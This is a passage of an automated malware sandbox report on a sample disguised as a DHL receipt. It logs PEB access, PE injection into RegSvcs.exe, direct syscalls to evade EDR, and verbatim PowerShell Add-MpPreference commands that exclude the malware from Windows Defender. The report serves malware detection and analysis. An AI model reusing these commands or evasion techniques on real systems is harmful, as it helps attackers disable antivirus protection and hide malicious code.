                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE29A0 mov eax, dword ptr fs:[00000030h]10_2_00FE29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01066870 mov eax, dword ptr fs:[00000030h]10_2_01066870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01066870 mov eax, dword ptr fs:[00000030h]10_2_01066870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105E872 mov eax, dword ptr fs:[00000030h]10_2_0105E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105E872 mov eax, dword ptr fs:[00000030h]10_2_0105E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105C89D mov eax, dword ptr fs:[00000030h]10_2_0105C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF6962 mov eax, dword ptr fs:[00000030h]10_2_00FF6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF6962 mov eax, dword ptr fs:[00000030h]10_2_00FF6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF6962 mov eax, dword ptr fs:[00000030h]10_2_00FF6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC8918 mov eax, dword ptr fs:[00000030h]10_2_00FC8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC8918 mov eax, dword ptr fs:[00000030h]10_2_00FC8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109A8E4 mov eax, dword ptr fs:[00000030h]10_2_0109A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C8F9 mov eax, dword ptr fs:[00000030h]10_2_0100C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100C8F9 mov eax, dword ptr fs:[00000030h]10_2_0100C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104EB1D mov eax, dword ptr fs:[00000030h]10_2_0104EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104EB1D mov eax, dword ptr fs:[00000030h]10_2_0104EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104EB1D mov eax, dword ptr fs:[00000030h]10_2_0104EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104EB1D mov eax, dword ptr fs:[00000030h]10_2_0104EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104EB1D mov eax, dword ptr fs:[00000030h]10_2_0104EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104EB1D mov eax, dword ptr fs:[00000030h]10_2_0104EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104EB1D mov eax, dword ptr fs:[00000030h]10_2_0104EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104EB1D mov eax, dword ptr fs:[00000030h]10_2_0104EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104EB1D mov eax, dword ptr fs:[00000030h]10_2_0104EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01098B28 mov eax, dword ptr fs:[00000030h]10_2_01098B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01098B28 mov eax, dword ptr fs:[00000030h]10_2_01098B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD0AD0 mov eax, dword ptr fs:[00000030h]10_2_00FD0AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01078B42 mov eax, dword ptr fs:[00000030h]10_2_01078B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01066B40 mov eax, dword ptr fs:[00000030h]10_2_01066B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01066B40 mov eax, dword ptr fs:[00000030h]10_2_01066B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0109AB40 mov eax, dword ptr fs:[00000030h]10_2_0109AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107EB50 mov eax, dword ptr fs:[00000030h]10_2_0107EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8AA0 mov eax, dword ptr fs:[00000030h]10_2_00FD8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8AA0 mov eax, dword ptr fs:[00000030h]10_2_00FD8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA80 mov eax, dword ptr fs:[00000030h]10_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA80 mov eax, dword ptr fs:[00000030h]10_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA80 mov eax, dword ptr fs:[00000030h]10_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA80 mov eax, dword ptr fs:[00000030h]10_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA80 mov eax, dword ptr fs:[00000030h]10_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA80 mov eax, dword ptr fs:[00000030h]10_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA80 mov eax, dword ptr fs:[00000030h]10_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA80 mov eax, dword ptr fs:[00000030h]10_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDEA80 mov eax, dword ptr fs:[00000030h]10_2_00FDEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0A5B mov eax, dword ptr fs:[00000030h]10_2_00FE0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0A5B mov eax, dword ptr fs:[00000030h]10_2_00FE0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6A50 mov eax, dword ptr fs:[00000030h]10_2_00FD6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6A50 mov eax, dword ptr fs:[00000030h]10_2_00FD6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6A50 mov eax, dword ptr fs:[00000030h]10_2_00FD6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6A50 mov eax, dword ptr fs:[00000030h]10_2_00FD6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6A50 mov eax, dword ptr fs:[00000030h]10_2_00FD6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6A50 mov eax, dword ptr fs:[00000030h]10_2_00FD6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD6A50 mov eax, dword ptr fs:[00000030h]10_2_00FD6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF4A35 mov eax, dword ptr fs:[00000030h]10_2_00FF4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF4A35 mov eax, dword ptr fs:[00000030h]10_2_00FF4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFEA2E mov eax, dword ptr fs:[00000030h]10_2_00FFEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107EBD0 mov eax, dword ptr fs:[00000030h]10_2_0107EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105CBF0 mov eax, dword ptr fs:[00000030h]10_2_0105CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFEBFC mov eax, dword ptr fs:[00000030h]10_2_00FFEBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]10_2_00FD8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]10_2_00FD8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD8BF0 mov eax, dword ptr fs:[00000030h]10_2_00FD8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0105CA11 mov eax, dword ptr fs:[00000030h]10_2_0105CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100CA24 mov eax, dword ptr fs:[00000030h]10_2_0100CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD0BCD mov eax, dword ptr fs:[00000030h]10_2_00FD0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD0BCD mov eax, dword ptr fs:[00000030h]10_2_00FD0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FD0BCD mov eax, dword ptr fs:[00000030h]10_2_00FD0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF0BCB mov eax, dword ptr fs:[00000030h]10_2_00FF0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF0BCB mov eax, dword ptr fs:[00000030h]10_2_00FF0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF0BCB mov eax, dword ptr fs:[00000030h]10_2_00FF0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100CA38 mov eax, dword ptr fs:[00000030h]10_2_0100CA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0BBE mov eax, dword ptr fs:[00000030h]10_2_00FE0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FE0BBE mov eax, dword ptr fs:[00000030h]10_2_00FE0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0107EA60 mov eax, dword ptr fs:[00000030h]10_2_0107EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100CA6F mov eax, dword ptr fs:[00000030h]10_2_0100CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100CA6F mov eax, dword ptr fs:[00000030h]10_2_0100CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100CA6F mov eax, dword ptr fs:[00000030h]10_2_0100CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104CA72 mov eax, dword ptr fs:[00000030h]10_2_0104CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0104CA72 mov eax, dword ptr fs:[00000030h]10_2_0104CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCCB7E mov eax, dword ptr fs:[00000030h]10_2_00FCCB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4A80 mov eax, dword ptr fs:[00000030h]10_2_010A4A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01008A90 mov edx, dword ptr fs:[00000030h]10_2_01008A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01026AA4 mov eax, dword ptr fs:[00000030h]10_2_01026AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01026ACC mov eax, dword ptr fs:[00000030h]10_2_01026ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01026ACC mov eax, dword ptr fs:[00000030h]10_2_01026ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01026ACC mov eax, dword ptr fs:[00000030h]10_2_01026ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01004AD0 mov eax, dword ptr fs:[00000030h]10_2_01004AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01004AD0 mov eax, dword ptr fs:[00000030h]10_2_01004AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFEB20 mov eax, dword ptr fs:[00000030h]10_2_00FFEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FFEB20 mov eax, dword ptr fs:[00000030h]10_2_00FFEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100AAEE mov eax, dword ptr fs:[00000030h]10_2_0100AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0100AAEE mov eax, dword ptr fs:[00000030h]10_2_0100AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01088D10 mov eax, dword ptr fs:[00000030h]10_2_01088D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01088D10 mov eax, dword ptr fs:[00000030h]10_2_01088D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01004D1D mov eax, dword ptr fs:[00000030h]10_2_01004D1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01058D20 mov eax, dword ptr fs:[00000030h]10_2_01058D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FCCCC8 mov eax, dword ptr fs:[00000030h]10_2_00FCCCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF8CB1 mov eax, dword ptr fs:[00000030h]10_2_00FF8CB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FF8CB1 mov eax, dword ptr fs:[00000030h]10_2_00FF8CB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01068D6B mov eax, dword ptr fs:[00000030h]10_2_01068D6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FC8C8D mov eax, dword ptr fs:[00000030h]10_2_00FC8C8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01006DA0 mov eax, dword ptr fs:[00000030h]10_2_01006DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01098DAE mov eax, dword ptr fs:[00000030h]10_2_01098DAE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01098DAE mov eax, dword ptr fs:[00000030h]10_2_01098DAE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010A4DAD mov eax, dword ptr fs:[00000030h]10_2_010A4DAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDAC50 mov eax, dword ptr fs:[00000030h]10_2_00FDAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDAC50 mov eax, dword ptr fs:[00000030h]10_2_00FDAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00FDAC50 mov eax, dword ptr fs:[00000030h]10_2_00FDAC50
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtTerminateThread: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeNtCreateKey: Direct from: 0x76EF2C6C
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe protection: read write
